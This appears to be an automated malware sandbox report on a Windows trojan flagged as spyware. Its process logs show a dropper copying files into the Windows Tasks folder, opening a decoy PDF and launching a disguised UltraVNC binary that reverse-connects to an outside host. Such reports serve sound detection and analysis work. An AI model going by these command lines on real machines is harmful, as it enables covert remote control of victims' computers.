Binary string: \Device\ConDrv\Serveronecore\windows\core\console\open\src\server\winntcontrol.cpponecore\windows\core\console\open\src\interactivity\base\servicelocator.cppHost Signal Handler Threadonecore\windows\core\console\open\src\interactivity\base\hostsignalinputthread.cpponecore\windows\core\console\open\src\interactivity\win32\uiatextrange.cpponecore\windows\core\console\open\src\interactivity\win32\accessibilitynotifier.cpponecore\windows\core\console\open\src\interactivity\win32\windowmetrics.cpponecore\windows\core\console\open\src\interactivity\win32\systemconfigurationprovider.cpponecore\windows\core\console\open\src\interactivity\win32\window.cpponecore\windows\core\console\open\src\interactivity\win32\windowio.cpponecore\windows\core\console\open\src\interactivity\win32\icon.cpponecore\windows\core\console\open\src\interactivity\win32\windowuiaprovider.cpponecore\windows\core\console\open\src\interactivity\win32\windowproc.cpponecore\windows\core\console\open\src\interactivity\win32\clipboard.cpponecore\windows\core\console\open\src\interactivity\win32\screeninfouiaprovider.cpponecore\windows\core\console\open\src\types\viewport.cpponecore\windows\core\console\open\src\types\convert.cpponecore\windows\core\console\open\src\types\utils.cpp

Source: classification engine

Classification label: mal92.troj.spyw.evad.winEXE@56/62@7/1

Source: C:\Users\user\Desktop\7q551ugrWe.exe

Code function: 0_2_00408DBF wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,

0_2_00408DBF

Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7D18A0 GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,	22_2_00007FF67E7D18A0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7D3550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx,	22_2_00007FF67E7D3550
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7D34B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,	22_2_00007FF67E7D34B0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7D18A0 GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,	25_2_00007FF67E7D18A0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7D3550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx,	25_2_00007FF67E7D3550
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7D34B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,	25_2_00007FF67E7D34B0

Source: C:\Users\user\Desktop\7q551ugrWe.exe

Code function: 0_2_004011D1 GetDiskFreeSpaceExW,SendMessageW,

0_2_004011D1

Source: C:\Windows\Tasks\sync_browser.exe	Code function: OpenSCManagerA,CreateServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,		22_2_00007FF67E7D2D00
Source: C:\Windows\Tasks\sync_browser.exe	Code function: OpenSCManagerA,CreateServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,		25_2_00007FF67E7D2D00

Source: C:\Windows\Tasks\sync_browser.exe

Code function: 22_2_00007FF67E829BC0 LoadLibraryA,GetProcAddress,GetProcAddress,GetSystemMetrics,GetCurrentProcessId,ProcessIdToSessionId,CreateToolhelp32Snapshot,Process32First,CloseHandle,FreeLibrary,ProcessIdToSessionId,ProcessIdToSessionId,CloseHandle,FreeLibrary,Process32Next,

22_2_00007FF67E829BC0

Source: C:\Users\user\Desktop\7q551ugrWe.exe

Code function: 0_2_0040385E _wtol,_wtol,SHGetSpecialFolderPathW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,CoCreateInstance,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,

0_2_0040385E

Source: C:\Users\user\Desktop\7q551ugrWe.exe

Code function: 0_2_00401DC9 GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,wsprintfW,LoadLibraryA,GetProcAddress,

0_2_00401DC9

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\Downloads\Lom.pdf

Jump to behavior

Source: C:\Windows\Tasks\sync_browser.exe	Mutant created: \Sessions\1\BaseNamedObjects\WinVNC_Win32_Instance_Mutex
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:1832:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7620:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7504:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7564:120:WilError_03

Source: C:\Users\user\Desktop\7q551ugrWe.exe

File created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000

Jump to behavior

Source: 7q551ugrWe.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\taskkill.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "sync_browser.exe")

Source: C:\Users\user\Desktop\7q551ugrWe.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\7q551ugrWe.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 7q551ugrWe.exe

ReversingLabs: Detection: 23%

Source: sync_browser.exe	String found in binary or memory: -stopservice
Source: sync_browser.exe	String found in binary or memory: -install
Source: sync_browser.exe	String found in binary or memory: -startservice
Source: sync_browser.exe	String found in binary or memory: -stopservice
Source: sync_browser.exe	String found in binary or memory: -install
Source: sync_browser.exe	String found in binary or memory: -startservice

Source: C:\Users\user\Desktop\7q551ugrWe.exe

File read: C:\Users\user\Desktop\7q551ugrWe.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\7q551ugrWe.exe "C:\Users\user\Desktop\7q551ugrWe.exe"
Source: C:\Users\user\Desktop\7q551ugrWe.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\." "%CD%\..\..\..\..\..\..\Windows\Tasks\"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\7q551ugrWe.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 0271695705143540 0271695705143540.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\7q551ugrWe.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 0271695705143540.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im sync_browser.exe
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1724,i,3112944997856603396,2159099869268149404,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_VPANJC -connect tbdcic.info:443
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 4
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 42
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 42
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 42
Source: C:\Users\user\Desktop\7q551ugrWe.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\." "%CD%\..\..\..\..\..\..\Windows\Tasks\"	Jump to behavior
Source: C:\Users\user\Desktop\7q551ugrWe.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 0271695705143540 0271695705143540.cmd	Jump to behavior
Source: C:\Users\user\Desktop\7q551ugrWe.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 0271695705143540.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im sync_browser.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 8	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_VPANJC -connect tbdcic.info:443	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 4	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 42	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 42	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 8	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 42	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1724,i,3112944997856603396,2159099869268149404,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\user\Desktop\7q551ugrWe.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\7q551ugrWe.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\7q551ugrWe.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\7q551ugrWe.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\7q551ugrWe.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\7q551ugrWe.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\7q551ugrWe.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\7q551ugrWe.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\7q551ugrWe.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\7q551ugrWe.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\7q551ugrWe.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\7q551ugrWe.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\7q551ugrWe.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\7q551ugrWe.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\7q551ugrWe.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\7q551ugrWe.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\7q551ugrWe.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\7q551ugrWe.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\7q551ugrWe.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\7q551ugrWe.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\7q551ugrWe.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\7q551ugrWe.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: apphelp.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: winmm.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: version.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: userenv.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: dwmapi.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: sspicli.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: winsta.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: napinsp.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: wshbth.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: nlaapi.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: mswsock.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: winrnr.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: wldp.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: riched32.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: riched20.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: usp10.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: msls31.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: riched32.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: riched20.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: usp10.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: msls31.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: riched32.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: riched20.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: usp10.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: msls31.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: riched32.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: riched20.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: usp10.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: msls31.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: riched32.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: riched20.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: usp10.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: msls31.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: riched32.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: riched20.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: usp10.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: msls31.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: winmm.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: version.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: userenv.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: dwmapi.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: napinsp.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: wshbth.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: nlaapi.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: mswsock.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: winrnr.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Tasks\sync_browser.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll

Source: C:\Windows\SysWOW64\cmd.exe

File written: C:\Windows\Tasks\UltraVNC.ini

Jump to behavior

Source: C:\Windows\Tasks\sync_browser.exe

File opened: C:\Windows\SYSTEM32\RICHED32.DLL

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: 7q551ugrWe.exe

Static file information: File size 1664495 > 1048576

Source:	Binary string: conhost.pdbUGP source: 7q551ugrWe.exe, 00000000.00000003.1347959077.0000000002792000.00000004.00000020.00020000.00000000.sdmp, Nfe70s.UFVVkM.2.dr, Nfe70s.UFVVkM.0.dr, conhost.exe.6.dr
Source:	Binary string: conhost.pdb source: 7q551ugrWe.exe, 00000000.00000003.1347959077.0000000002792000.00000004.00000020.00020000.00000000.sdmp, Nfe70s.UFVVkM.2.dr, Nfe70s.UFVVkM.0.dr, conhost.exe.6.dr

Source: Nfe70s.UFVVkM.0.dr

Static PE information: 0x998FF43F [Tue Aug 22 20:17:03 2051 UTC]

Source: C:\Users\user\Desktop\7q551ugrWe.exe

Code function: 0_2_0040236F LoadLibraryA,GetProcAddress,GetNativeSystemInfo,

0_2_0040236F

Source: 7q551ugrWe.exe

Static PE information: real checksum: 0x2af97 should be: 0x19ec51

Source: Nfe70s.UFVVkM.0.dr	Static PE information: section name: .didat
Source: Nfe70s.UFVVkM.2.dr	Static PE information: section name: .didat
Source: conhost.exe.6.dr	Static PE information: section name: .didat

Source: C:\Users\user\Desktop\7q551ugrWe.exe	Code function: 0_2_00413660 push eax; ret	0_2_0041368E
